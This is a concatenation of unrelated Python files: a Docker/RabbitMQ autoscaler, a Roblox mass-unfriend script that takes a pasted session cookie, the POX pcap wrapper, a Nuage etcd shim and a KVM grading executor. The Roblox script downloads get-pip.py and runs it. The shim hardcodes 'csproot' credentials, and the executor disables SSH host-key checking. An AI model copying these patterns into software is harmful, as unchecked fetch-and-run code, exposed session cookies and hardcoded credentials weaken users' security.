self._rabbitmq_client = RabbitMQClient(
self,
amqp_url = self._amqp_url,
queues = {
self._task_queue: {
"durable": True,
"exclusive": False,
"auto_delete": False,
"auto_ack": False,
"callback": None
},
self._keep_alive_queue: {
"durable": True,
"exclusive": False,
"auto_delete": False,
"auto_ack": True,
"callback": "callback_keep_alive_queue"
}
},
reconection_time = self._reconection_time,
prefetch_count = self._prefetch_count,
debug = self._debug
)
def callback_keep_alive_queue(self, ch, method, properties, body):
data = loads(body)
worker = data['id']
if (self._docker_client.get_container(worker)):
self._last_timestamps[worker] = data['timestamp']
def update_queue_data(self):
message_count = self._rabbitmq_client.message_count(self._task_queue)
if (message_count is not None):
self._current_state['replica_count'] = self._docker_client.get_service_replica_count(service_name=self._service_monitor)
self._current_state['msg_count'] = message_count
self._current_state['load'] = self._current_state['msg_count'] / (self._current_state['replica_count'][0] * self._qty_task)
self._current_state['ligth'] = self.get_ligth(self._current_state['load'])
def get_ligth(self, load):
for light in list(self._lights):
if (load < self._lights[light]):
return light
return 'RED'
def response_to_light(self):
count = 0
while (True):
self.update_queue_data()
print(BColors.__dict__[self._current_state['ligth']] + f" [+] Workers State - Work Load: {self._current_state['load']:.2f} - Replicas: {'/'.join([str(i) for i in self._current_state['replica_count']])} - Msg count: {self._current_state['msg_count']}" + BColors.ENDC)
print(f" [#] {datetime.now().strftime('%H:%M:%S.%f')} {self._current_state['load']:.2f} {self._current_state['ligth']}")
if (self._current_state['ligth'] == 'GREY'):
# Our workers are idle so we kill some
count += 1
if (count >= 3):
self.remove_worker()
count = 0
elif (self._current_state['ligth'] == 'GREEN'):
# Our workers are good so we do nothing
count = 0
elif (self._current_state['ligth'] == 'YELLOW'):
# Our workers are busy so we create more
count = 0
self.create_worker()
elif (self._current_state['ligth'] == 'RED'):
# Our workers are very busy so we create a lot more (2x)
count = 0
self.create_worker(2)
sleep(self._refresh_rate)
def create_worker(self, scale_step=1):
scale_to = self._current_state['replica_count'][1] + scale_step
if (scale_to <= self._max_scale):
if (self._debug):
print(f"Scaling up {self._service_monitor} from {self._current_state['replica_count'][1]} to {scale_to} replicas")
self._docker_client.scale_service(service_name=self._service_monitor, replica_count=scale_to)
else:
self.update_delivery(-1*self._step_batch_dealer)
def update_delivery(self, batch=100, wait=None):
envs = self._docker_client.get_service_env(self._service_dealer)
if envs is None: return
if self._min_batch_dealer <= literal_eval(envs['BATCH']) + batch <= self._max_batch_dealer:
if (self._debug): print(f"Updating {self._service_dealer}. BATCH += {batch} and WAIT += {wait} ")
self._docker_client.update_service_env_add(
self._service_dealer,
new_env= {
'BATCH': batch,
'WAIT': wait,
}
)
def remove_worker(self, scale_step=1):
scale_to = self._current_state['replica_count'][1] - scale_step
if (scale_to >= self._min_scale):
if (self._debug):
print(f"Scaling down {self._service_monitor} from {self._current_state['replica_count'][1]} to {scale_to} replicas")
self._docker_client.scale_service(service_name=self._service_monitor, replica_count=scale_to)
def calculate_timeout_workers(self):
# Calculo si algun worker lleva demasiado tiempo sin responder
while (True): # recorro array con workers y sus tiempos.
p = None
if (len(self._last_timestamps) > 0 and self._debug):
p = f"{'-'*80}\n{BColors.GREY}\tWORKER\t\tLAST SEEN\t\t\tSTATUS\t{BColors.ENDC}\n"
last_timestamps_tmp = copy(self._last_timestamps)
removed_workers = []
for worker, timestamp in last_timestamps_tmp.items():
timeout_worker = datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S.%f')
diff = datetime.now() - timeout_worker
container = self._docker_client.get_container(worker)
if (not container):
removed_workers.append((worker, 0))
else:
if (diff > self._max_timeout):
status = ('NOT RESPONDING', BColors.RED)
if (container):
container.remove()
removed_workers.append((worker, 1))
elif (diff > self._max_timeout/2): # excede la mitad del tiempo de timeout
status = ('WARNING', BColors.YELLOW)
else:
status = ('OK', BColors.GREEN)
if (self._debug):
p += f"\t{status[1]}{worker}\t{timestamp}\t{status[0]}\t{BColors.ENDC}\n"
if (self._debug and p is not None):
print(p)
for removed_worker in removed_workers:
self._last_timestamps.pop(removed_worker[0])
if (self._debug and removed_worker[1] == 1):
print(f' [!] Worker {removed_worker[0]} is NOT responding.')
print(f' [+] Worker {removed_worker[0]} removed.')
sleep(self._refresh_rate)
def start(self):
t3 = Thread(target=self._rabbitmq_client.start)
t3.start()
self._docker_client = DockerAPIClient()
self._current_state = {
'msg_count': -1,
'ligth': 'GREEN',
'load': 0.4,
'replica_count': self._docker_client.get_service_replica_count(service_name=self._service_monitor)
}
t1 = Thread(target=self.response_to_light)
t1.start()
t2 = Thread(target=self.calculate_timeout_workers)
t2.start()
def main():
"""Main entry point to the program."""
admin = AdminWorker()
admin.start()
if __name__ == '__main__':
main()
|
main.py
|
import subprocess, threading, time, os
try:
import requests
from termcolor import cprint
except:
try:
import pip
except ImportError:
os.system("")
print("[", end="")
print('\033[31m'+" ERROR ", "red", end="")
print("] " , end="")
print('\033[31m'+"Pip not installed. Installing now...")
subprocess.call("curl https://bootstrap.pypa.io/get-pip.py --output get-pip.py", shell=True)
time.sleep(5)
os.system("get-pip.py")
print("[", end="")
print('\033[31m'+" ERROR ", "red", end="")
print("] " , end="")
print('\033[31m'+"Packages not installed. Installing now...")
subprocess.call("pip install termcolor", shell=True)
subprocess.call("pip install requests", shell=True)
finally:
import requests
from termcolor import cprint
# Made by Ice Bear#0167
def getXsrf(cookie):
xsrfRequest = requests.post("https://auth.roblox.com/v2/logout", cookies={
'.ROBLOSECURITY': cookie
})
return xsrfRequest.headers["x-csrf-token"]
def clear():
if os.name == 'nt':
os.system("cls")
else:
os.system("clear")
class Unfriend:
global headers
global cookie
def unfriend(_):
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint("Unfriending friends....", "magenta")
friends = requests.get(f"https://friends.roblox.com/v1/users/{userid}/friends", cookies={'.ROBLOSECURITY': str(cookie)}).json()['data']
friendIds = [friend['id'] for friend in friends]
for i in friendIds:
time.sleep(0.1)
print(requests.post(f"https://friends.roblox.com/v1/users/{i}/unfriend",cookies={'.ROBLOSECURITY': str(cookie)}, headers=headers).text)
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint(f"Unfriended {i}!", "magenta")
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint("Unfriended All!", "magenta")
def check(_):
global cookie
global message
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint("Enter Your Cookie Below:", 'magenta')
cookie = input("> ")
return requests.get('https://api.roblox.com/currency/balance', cookies={'.ROBLOSECURITY': str(cookie)})
def start(_):
global headers
global userid
global goOn
os.system("")
check = Unfriend.check()
if check.status_code ==200:
headers={'X-CSRF-TOKEN': getXsrf(cookie)}
userdata = requests.get("https://users.roblox.com/v1/users/authenticated",cookies={".ROBLOSECURITY":cookie}).json() #get user data
userid = userdata['id'] #user id
clear()
threading.Thread(target=Unfriend.unfriend).start()
else:
print("[", end="")
cprint(" ERROR ", "red", end="")
print("] " , end="")
cprint("Invalid Cookie", 'red')
time.sleep(1.4)
clear()
Unfriend.check()
if __name__ == '__main__':
Unfriend = Unfriend()
Unfriend.start()
# Coded by Ice Bear#0167
|
__init__.py
|
# Copyright 2011,2013 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
enabled = False
try:
import platform
import importlib
_module = 'pox.lib.pxpcap.%s.pxpcap' % (platform.system().lower(),)
pcapc = importlib.import_module(_module)
enabled = True
except:
# Try generic...
try:
import pxpcap as pcapc
enabled = True
except:
# We can at least import the rest
pass
from pox.lib.addresses import IPAddr, EthAddr, IPAddr6
import parser
from threading import Thread, Lock
import pox.lib.packet as pkt
import copy
# pcap's filter compiling function isn't threadsafe, so we use this
# lock when compiling filters.
_compile_lock = Lock()
class PCap (object):
use_select = False # Falls back to non-select
@staticmethod
def get_devices ():
def ip (addr):
if addr is None: return None
return IPAddr(addr, networkOrder=True)
def ip6 (addr):
if addr is None: return None
return IPAddr6.from_raw(addr)
def link (addr):
if addr is None: return None
if len(addr) != 6: return None
return EthAddr(addr)
devs = pcapc.findalldevs()
out = {}
for d in devs:
addrs = {}
n = {'desc':d[1],'addrs':addrs}
out[d[0]] = n
for a in d[2]:
if a[0] == 'AF_INET':
na = {}
addrs[a[0]] = na
na['addr'] = ip(a[1])
na['netmask'] = ip(a[2])
na['broadaddr'] = ip(a[3])
na['dstaddr'] = ip(a[4])
elif a[0] == 'AF_INET6':
na = {}
addrs[a[0]] = na
na['addr'] = ip6(a[1])
na['netmask'] = ip6(a[2])
na['broadaddr'] = ip6(a[3])
na['dstaddr'] = ip6(a[4])
elif a[0] == 'AF_LINK':
na = {}
addrs[a[0]] = na
na['addr'] = link(a[1])
na['netmask'] = link(a[2])
na['broadaddr'] = link(a[3])
na['dstaddr'] = link(a[4])
elif a[0] == 'AF_PACKET':
addrs[a[0]] = {'addr':link(a[1])}
elif a[0] == 'ethernet':
addrs[a[0]] = {'addr':link(a[1])}
return out
@staticmethod
def get_device_names ():
return [d[0] for d in pcapc.findalldevs()]
def __init__ (self, device = None, promiscuous = True, period = 10,
start = True, callback = None, filter = None,
use_bytearray = False, **kw):
"""
Initialize this instance
use_bytearray: specifies capturing to bytearray buffers instead of bytes
"""
if filter is not None:
self.deferred_filter = (filter,)
else:
self.deferred_filter = None
self.packets_received = 0
self.packets_dropped = 0
self._thread = None
self.pcap = None
self.promiscuous = promiscuous
self.device = None
self.use_bytearray = use_bytearray
self.period = period
self.netmask = IPAddr("0.0.0.0")
self._quitting = False
self.addresses = {}
if callback is None:
self.callback = self.__class__._handle_rx
else:
self.callback = callback
for k,v in kw.items():
assert not hasattr(self, k)
setattr(self, k, v)
if device is not None:
self.open(device)
if self.pcap is not None:
if start:
self.start()
def _handle_rx (self, data, sec, usec, length):
pass
def open (self, device, promiscuous = None, period = None,
incoming = True, outgoing = False):
assert self.device is None
self.addresses = self.get_devices()[device]['addrs']
if 'AF_INET' in self.addresses:
self.netmask = self.addresses['AF_INET'].get('netmask')
if self.netmask is None: self.netmask = IPAddr("0.0.0.0")
#print "NM:",self.netmask
#print self.addresses['AF_LINK']['addr']
self.device = device
if period is not None:
self.period = period
if promiscuous is not None:
self.promiscuous = promiscuous
self.pcap = pcapc.open_live(device, 65535,
1 if self.promiscuous else 0, self.period)
pcapc.setdirection(self.pcap, incoming, outgoing)
self.packets_received = 0
self.packets_dropped = 0
if self.deferred_filter is not None:
self.set_filter(*self.deferred_filter)
self.deferred_filter = None
def set_direction (self, incoming, outgoing):
pcapc.setdirection(self._pcap, incoming, outgoing)
def set_nonblocking (self, nonblocking = True):
pcapc.setnonblock(self._pcap, 1 if nonblocking else 0)
def set_blocking (self, blocking = True):
self.set_nonblocking(nonblocking = not blocking)
@property
def blocking (self):
return False if pcapc.getnonblock(self._pcap) else True
@blocking.setter
def blocking (self, value):
self.set_blocking(value)
def next_packet (self, allow_threads = True):
"""
Get next packet
Returns tuple with:
data, timestamp_seconds, timestamp_useconds, total length, and
the pcap_next_ex return value -- 1 is success
"""
return pcapc.next_ex(self._pcap, bool(self.use_bytearray), allow_threads)
def _select_thread_func (self):
try:
import select
fd = [self.fileno()]
except:
# Fall back
self._thread_func()
return
self.blocking = False
while not self._quitting:
rr,ww,xx = select.select(fd, [], fd, 2)
if xx:
# Apparently we're done here.
break
if rr:
r = self.next_packet(allow_threads = False)
if r[-1] == 0: continue
if r[-1] == 1:
self.callback(self, r[0], r[1], r[2], r[3])
else:
break
self._quitting = False
self._thread = None
def _thread_func (self):
while not self._quitting:
pcapc.dispatch(self.pcap,100,self.callback,self,bool(self.use_bytearray),True)
self.packets_received,self.packets_dropped = pcapc.stats(self.pcap)
self._quitting = False
self._thread = None
def _handle_GoingDownEvent (self, event):
self.close()
def start (self):
assert self._thread is None
from pox.core import core
core.addListeners(self, weak=True)
if self.use_select:
self._thread = Thread(target=self._select_thread_func)
else:
self._thread = Thread(target=self._thread_func)
#self._thread.daemon = True
self._thread.start()
def stop (self):
t = self._thread
if t is not None:
self._quitting = True
pcapc.breakloop(self.pcap)
t.join()
def close (self):
if self.pcap is None: return
self.stop()
pcapc.close(self.pcap)
self.pcap = None
def __del__ (self):
self.close()
@property
def _pcap (self):
if self.pcap is None:
raise RuntimeError("PCap object not open")
return self.pcap
def inject (self, data):
if isinstance(data, pkt.ethernet):
data = data.pack()
if not isinstance(data, (bytes,bytearray)):
data = bytes(data) # Give it a try...
return pcapc.inject(self.pcap, data)
def set_filter (self, filter, optimize = True):
if self.pcap is None:
self.deferred_filter = (filter, optimize)
return
if isinstance(filter, str):
filter = Filter(filter, optimize, self.netmask.toSignedN(),
pcap_obj=self)
elif isinstance(filter, Filter):
pass
else:
raise RuntimeError("Filter must be string or Filter object")
pcapc.setfilter(self.pcap, filter._pprogram)
def fileno (self):
if self.pcap is None:
raise RuntimeError("PCap object not open")
r = pcapc.get_selectable_fd(self.pcap)
if r == -1:
raise RuntimeError("Selectable FD not available")
return r
def __str__ (self):
return "PCap(device=%s)" % (self.device)
class Filter (object):
def __init__ (self, filter, optimize = True, netmask = None,
pcap_obj = None, link_type = 1, snaplen = 65535):
self._pprogram = None
if netmask is None:
netmask = 0
elif isinstance(netmask, IPAddr):
netmask = netmask.toSignedN()
delpc = False
if pcap_obj is None:
delpc = True
pcap_obj = pcapc.open_dead(link_type, snaplen)
if isinstance(pcap_obj, PCap):
pcap_obj = pcap_obj.pcap
with _compile_lock:
self._pprogram = pcapc.compile(pcap_obj, filter,
1 if optimize else 0, netmask)
if delpc:
pcapc.close(pcap_obj)
def __del__ (self):
if self._pprogram:
pcapc.freecode(self._pprogram)
try:
_link_type_names = {}
for k,v in copy.copy(pcapc.__dict__).iteritems():
if k.startswith("DLT_"):
_link_type_names[v] = k
except:
pass
def get_link_type_name (dlt):
return _link_type_names.get(dlt, "<Unknown " + str(dlt) + ">")
def test (interface = "en1"):
""" Test function """
global drop,total,bytes_got,bytes_real,bytes_diff
drop = 0
total = 0
bytes_got = 0
bytes_real = 0
bytes_diff = 0
def cb (obj, data, sec, usec, length):
global drop,total,bytes_got,bytes_real,bytes_diff
#print ">>>",data
t,d = pcapc.stats(obj.pcap)
bytes_got += len(data)
bytes_real += length
nbd = bytes_real - bytes_got
if nbd != bytes_diff:
bytes_diff = nbd
print "lost bytes:",nbd
if t > total:
total = t + 500
print t,"total"
if d > drop:
drop = d
print d, "dropped"
p = pkt.ethernet(data)
ip = p.find('ipv4')
if ip:
print ip.srcip,"\t",ip.dstip, p
print "\n".join(["%i. %s" % x for x in
enumerate(PCap.get_device_names())])
if interface.startswith("#"):
interface = int(interface[1:])
interface = PCap.get_device_names()[interface]
print "Interface:",interface
p = PCap(interface, callback = cb,
filter = "icmp")
#[icmptype] != icmp-echoreply")
#filter = "ip host 74.125.224.148")
p.set_direction(True, True)
def ping (eth='00:18:02:6e:ce:55', ip='192.168.0.1'):
e = pkt.ethernet()
e.src = p.addresses['ethernet']['addr'] or '02:00:00:11:22:33'
e.dst = EthAddr(eth)
e.type = e.IP_TYPE
ipp = pkt.ipv4()
ipp.protocol = ipp.ICMP_PROTOCOL
ipp.srcip = p.addresses['AF_INET']['addr']
ipp.dstip = IPAddr(ip)
icmp = pkt.icmp()
icmp.type = pkt.ICMP.TYPE_ECHO_REQUEST
icmp.payload = "PingPing" * 6
ipp.payload = icmp
e.payload = ipp
p.inject(e)
def broadcast ():
ping('ff:ff:ff:ff:ff:ff','255.255.255.255')
import code
code.interact(local=locals())
def no_select ():
"""
Sets default PCap behavior to not try to use select()
"""
PCap.use_select = False
def do_select ():
"""
Sets default PCap behavior to try to use select()
"""
PCap.use_select = True
def interfaces (verbose = False):
"""
Show interfaces
"""
if not verbose:
print "\n".join(["%i. %s" % x for x in
enumerate(PCap.get_device_names())])
else:
import pprint
print pprint.pprint(PCap.get_devices())
from pox.core import core
core.quit()
def launch (interface, no_incoming=False, no_outgoing=False):
"""
pxshark -- prints packets
"""
def cb (obj, data, sec, usec, length):
p = pkt.ethernet(data)
print p.dump()
if interface.startswith("#"):
interface = int(interface[1:])
interface = PCap.get_device_names()[interface]
p = PCap(interface, callback = cb, start=False)
p.set_direction(not no_incoming, not no_outgoing)
#p.use_select = False
p.start()
|
nuage_gluon_shim.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016, Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Gluon shim layer for handling etcd messages
"""
import etcd
import os
import json
import argparse
import time
import string
import ntpath
import logging
from Queue import Queue
from threading import Thread
from nuage.vm_split_activation import NUSplitActivation
vsd_api_url = 'https://127.0.0.1:8443'
etcd_default_port = 2379
etcd_nuage_path = '/controller/nuage/'
client = None
prev_mod_index = 0
vm_status = {}
valid_host_ids = ('cbserver5', 'node-23.opnfvericsson.ca')
proton_etcd_dir = '/net-l3vpn/proton'
def notify_proton_vif(proton, uuid, vif_type):
path = proton + '/controller/host/' + uuid
data = {"status": vif_type}
client.write(path, json.dumps(data))
def notify_proton_status(proton, uuid, status):
path = proton + '/controller/port/' + uuid
data = {"status": status}
client.write(path, json.dumps(data))
def save_bind_status(uuid, status):
""" save the vm status both in etcd and in-memory dictionary
"""
path = etcd_nuage_path + uuid
data = {"status": status}
try:
if status == 'unbound':
client.delete(path)
del vm_status[uuid]
else:
client.write(path, json.dumps(data))
vm_status[uuid] = status
except Exception, e:
logging.error("saving bind status failed %s" % str(e))
def update_bind_status(proton, uuid, status):
"""wrapper function to call status update of the bind operation"""
notify_proton_status(proton, uuid, status)
save_bind_status(uuid,status)
def restore_bind_status():
"""restore the bind status from etcd to in-memory dict, typically called during program startup"""
global vm_status
try:
statuses = client.read(etcd_nuage_path)
if statuses:
for status in statuses.children:
val = json.loads(status.value)
logging.info("storing key %s and value %s" % (status.key, val["status"]))
vm_status[ntpath.basename(status.key)] = val["status"]
logging.info("vm_status = %s", vm_status)
except Exception, e:
logging.error("reading keys failed %s" % str(e))
return
def initialize_worker_thread(messages_queue):
worker = Thread(target=process_queue, args=(messages_queue,))
worker.setDaemon(True)
worker.start()
return worker
def compute_network_addr(ip, prefix):
"""
return network address
"""
addr = ip.split('.')
prefix = int(prefix)
mask = [0, 0, 0, 0]
for i in range(prefix):
mask[i / 8] += (1 << (7 - i % 8))
net = []
for i in range(4):
net.append(int(addr[i]) & mask[i])
return '.'.join(str(e) for e in net)
def compute_netmask(prefix):
"""
return netmask
:param prefix:
:return:
"""
prefix = int(prefix)
mask = [0, 0, 0, 0]
for i in range(prefix):
mask[i / 8] += (1 << (7 - i % 8))
ret = '.'.join(str(e) for e in mask)
print('Calculated mask = %s' % ret)
return ret
def bind_vm(data, vpn_info):
subnet_name = 'Subnet' + str(time.clock())
subnet_name = string.replace(subnet_name, '.', '-')
prefix = data.get('subnet_prefix', '32')
print('prefix = %s' % prefix)
config = {
'api_url': vsd_api_url,
'domain_name': vpn_info['name'],
'enterprise': 'csp',
'enterprise_name': 'Gluon',
'netmask': compute_netmask(prefix),
'network_address': compute_network_addr(data.get('ipaddress', ''), prefix),
'password': 'csproot',
'route_distinguisher': vpn_info["route_distinguisher"],
'route_target': vpn_info["route_target"],
'subnet_name': subnet_name,
'username': 'csproot',
'vm_ip': data.get('ipaddress', ''),
'vm_mac': data.get('mac_address', ''),
'vm_name': data.get('device_id', ''), ## uuid of the VM
'vm_uuid': data.get('device_id',''),
'vport_name': data.get('id', ''),
'zone_name': 'Zone0',
'tunnel_type': 'GRE',
'domain_template_name': 'GluonDomainTemplate'
}
sa = NUSplitActivation(config)
return sa.activate()
def unbind_vm(data, vpn_info):
config = {
'api_url': vsd_api_url,
'domain_name': vpn_info['name'],
'enterprise': 'csp',
'enterprise_name': 'Gluon',
'username': 'csproot',
'password': 'csproot',
'vm_uuid': data.get('device_id', ''),
'vport_name': data.get('id', '')
}
sa = NUSplitActivation(config)
return sa.deactivate()
def get_vpn_info(client, uuid):
vpn_info = {}
try:
vpn_port = json.loads(client.get(proton_etcd_dir + '/VPNPort/' + uuid).value)
if not vpn_port:
logging.error("vpn port is empty for uuid %s" % uuid)
return False
else:
vpn_instance = json.loads(client.get(proton_etcd_dir + '/VpnInstance/' + vpn_port['vpn_instance']).value)
if vpn_instance:
vpn_info['route_distinguisher'] = vpn_instance['route_distinguishers']
vpn_info['name'] = vpn_instance['vpn_instance_name']
vpn_afconfig = json.loads(client.get(proton_etcd_dir + '/VpnAfConfig/' + vpn_instance['ipv4_family']).value)
if vpn_afconfig:
vpn_info['route_target'] = vpn_afconfig['vrf_rt_value']
else:
logging.error("vpnafconfig is empty for uuid %s" % uuid)
else:
logging.error("vpn instance is empty for %s" % vpn_port['vpn_instance'])
return False
except etcd.EtcdKeyNotFound:
return False
return vpn_info
def process_base_port_model(message, uuid, proton_name):
global client
global valid_host_ids
action = message.action
if action == 'set' or action == 'update':
message_value = json.loads(message.value)
if message_value['host_id'] is None or message_value['host_id'] == '':
logging.info("host id is empty")
if vm_status.get(uuid, '') == 'up' or vm_status.get(uuid, '') == 'pending':
logging.info("Port is bound, need to unbind")
if not hasattr(message, '_prev_node'):
logging.info("_prev_node is not available")
return
vpn_info = get_vpn_info(client, uuid)
unbind_vm(json.loads(message._prev_node.value), vpn_info)
update_bind_status(proton_name, uuid, 'unbound')
return
if not message_value['host_id'] in valid_host_ids:
logging.info("host id %s is not recognized", message_value['host_id'])
return
if uuid in vm_status and vm_status[uuid] == 'pending':
return
update_bind_status(proton_name, uuid, 'pending')
vpn_info = get_vpn_info(client, uuid)
if bind_vm(json.loads(message.value), vpn_info):
update_bind_status(proton_name, uuid, 'up')
return
else:
logging.error("failed activating vm")
return
elif action == 'delete':
if vm_status[uuid] == 'up':
vpn_info = get_vpn_info(client, uuid)
unbind_vm(json.loads(message.value), vpn_info)
update_bind_status(proton_name, uuid, 'unbound')
return
else:
logging.error('unknown action %s' % action)
def process_queue(messages_queue):
logging.info("processing queue")
while True:
item = messages_queue.get()
process_message(item)
messages_queue.task_done()
def process_message(message):
logging.info("msg = %s" % message)
#logging.info("msg.key = %s" % message.key)
#logging.info("msg.value = %s" % message.value)
#logging.info("msg.action = %s" % message.action)
path = message.key.split('/')
if len(path) < 5:
logging.error("unknown message %s, ignoring" % message)
return
proton_name = path[1]
table = path[3]
uuid = path[4]
if table == 'ProtonBasePort':
process_base_port_model(message, uuid, proton_name)
else:
logging.info('table %s is not monitored' % table)
return
def getargs():
parser = argparse.ArgumentParser(description='Start Shim Layer')
parser.add_argument('-d', '--debug', required=False, help='Enable debug output', dest='debug',
action='store_true')
parser.add_argument('-H', '--host-name', required=False, help='etcd hostname or ip, default to localhost',
dest='etcd_host', type=str)
parser.add_argument('-p', '--port', required=False, help='etcd port number, default to 2379', dest='etcd_port',
type=str)
parser.add_argument('-v', '--vsd-ip', required=False, help='Nuage vsd ip address, default to 127.0.0.1', dest='vsd_ip',
type=str)
args = parser.parse_args()
return args
def main():
global client, vsd_api_url
logging.basicConfig(level=logging.DEBUG)
logging.info('Starting server in PID %s' % os.getpid())
args = getargs()
if args.etcd_host:
etcd_host = args.etcd_host
else:
etcd_host = 'localhost'
if args.etcd_host:
etcd_port = int(args.etcd_port)
else:
etcd_port = etcd_default_port
if args.vsd_ip:
vsd_api_url = 'https://' + args.vsd_ip + ':8443'
messages_queue = Queue()
initialize_worker_thread(messages_queue)
client = etcd.Client(host=etcd_host, port=etcd_port, read_timeout=3600)
restore_bind_status()
wait_index = 0
while True:
try:
logging.info("watching %s" % proton_etcd_dir)
if wait_index:
message = client.read(proton_etcd_dir, recursive=True, wait=True, waitIndex=wait_index)
else:
message = client.read(proton_etcd_dir, recursive=True, wait=True)
messages_queue.put(message)
if (message.modifiedIndex - wait_index) > 1000:
wait_index = 0
else:
wait_index = message.modifiedIndex + 1
except etcd.EtcdWatchTimedOut:
logging.info("timeout")
pass
except etcd.EtcdException:
logging.error("Cannot connect to etcd, make sure that etcd is running. Trying in 5 seconds")
time.sleep(5)
except KeyboardInterrupt:
logging.info("exiting on interrupt")
exit(1)
except:
pass
if __name__ == '__main__':
main()
|
kvm_executor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""A script that starts a vm, reverts it to a known snapshot, tests a
submission bundle (submission + tests), and closes the vm"""
from __future__ import with_statement
# Use simplejson or Python 2.6 json, prefer simplejson.
try:
import simplejson as json
except ImportError:
import json
import os
import sys
import time
import logging
import signal
import ConfigParser
from threading import Thread
from subprocess import Popen
import serial
from subprocess import Popen, PIPE, STDOUT
from vmchecker.config import VmwareMachineConfig, CourseConfig, VmwareConfig
from vmchecker.generic_executor import VM, Host
_logger = logging.getLogger('vm_executor')
class kvmHost(Host):
def getVM(self, bundle_dir, vmcfg, assignment):
return kvmVM(self, bundle_dir, vmcfg, assignment)
class kvmVM(VM):
hostname = 'kvm2'
def __init__(self, host, bundle_dir, vmcfg, assignment):
VM.__init__(self, host, bundle_dir, vmcfg, assignment)
self.hostname = self.machinecfg.get_vmx_path()
self.path = self.getPath()
print self.path
def executeCommand(self,cmd):
_logger.info("executeCommand: %s" % cmd)
return self.host.executeCommand("ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "+self.username+"@"+self.IP+" "+cmd)
def power_on_kvm(self):
o = self.host.executeCommand("virsh start kvm2")
if "started" in o:
print "Exit"
sys.exit()
def start(self):
power_thd = Thread(target = self.power_on_kvm)
power_thd.start()
power_thd.join()
self.IP = self.getIP()
def stop(self):
self.host.executeCommand("virsh destroy "+self.hostname)
def revert(self, number = None):
self.stop() # just in case it's on
self.host.executeCommand("rm -f "+os.path.join(self.path,"run.qcow2"))
self.host.executeCommand("cp "+os.path.join(self.path,"image.qcow2")+" "+os.path.join(self.path,"run.qcow2"))
def copyTo(self, sourceDir, targetDir, files):
""" Copy files from host(source) to guest(target) """
for f in files:
host_path = os.path.join(sourceDir, f)
guest_path = os.path.join(targetDir, f)
if not os.path.exists(host_path):
_logger.error('host file (to send) "%s" does not exist' % host_path)
return
_logger.info('copy file %s from host to guest at %s' % (host_path, guest_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+host_path+" "+self.username+"@"+self.IP+":"+guest_path)
def copyFrom(self, sourceDir, targetDir, files):
""" Copy files from guest(source) to host(target) """
for f in files:
host_path = os.path.join(targetDir, f)
guest_path = os.path.join(sourceDir, f)
_logger.info('copy file %s from guest to host at %s' % (guest_path, host_path))
self.host.executeCommand("scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r "+self.username+"@"+self.IP+":"+guest_path+" "+host_path)
if not os.path.exists(host_path):
_logger.error('host file (received) "%s" does not exist' % host_path)
def run(self, shell, executable_file, timeout):
self.executeCommand("chmod +x "+ executable_file)
_logger.info('executing on the remote: prog=%s args=[%s] timeout=%d' % (shell, executable_file, timeout))
thd = Thread(target = self.executeCommand, args = (executable_file,))
thd.start()
if timeout==None:
thd.join()
else:
thd.join(timeout)
return thd.isAlive()
def getMac(self):
mac = self.host.executeCommand("virsh dumpxml "+self.hostname)
mac = mac[mac.find("<mac address=")+14:]
mac = mac[:mac.find("'/>")]
return mac.strip()
def getPath(self):
path = self.host.executeCommand("virsh dumpxml "+self.hostname)
path = path[path.find("<source file='")+14:]
path = path[:path.find("'/>")]
return os.path.dirname(path)
def getIP(self):
mac = self.getMac()
while True:
arps = self.host.executeCommand("arp -a").split("\n")
time.sleep(1)
for arp in arps:
if mac in arp:
IP = arp[arp.find("(")+1:arp.find(")")]
_logger.info("IP: %s" % IP)
return IP
def getIPfromIfconfig(self,string):
s = string[string.find("inet addr:")+10:]
s = s[0:s.find(" ")]
return s
|
worker.py
|
import logging
import threading
import time
from persistence import pop_from_queue
class ProcessingWorker(object):
current_workflow = None
current_step = None
_exit_event = threading.Event()
_worker_thread = None
def __init__(self):
self.logger = logging.getLogger('spreadsplug.web.worker')
def start(self):
self.logger.debug("Starting worker thread")
self._worker_thread = threading.Thread(target=self._run)
self._worker_thread.start()
def stop(self):
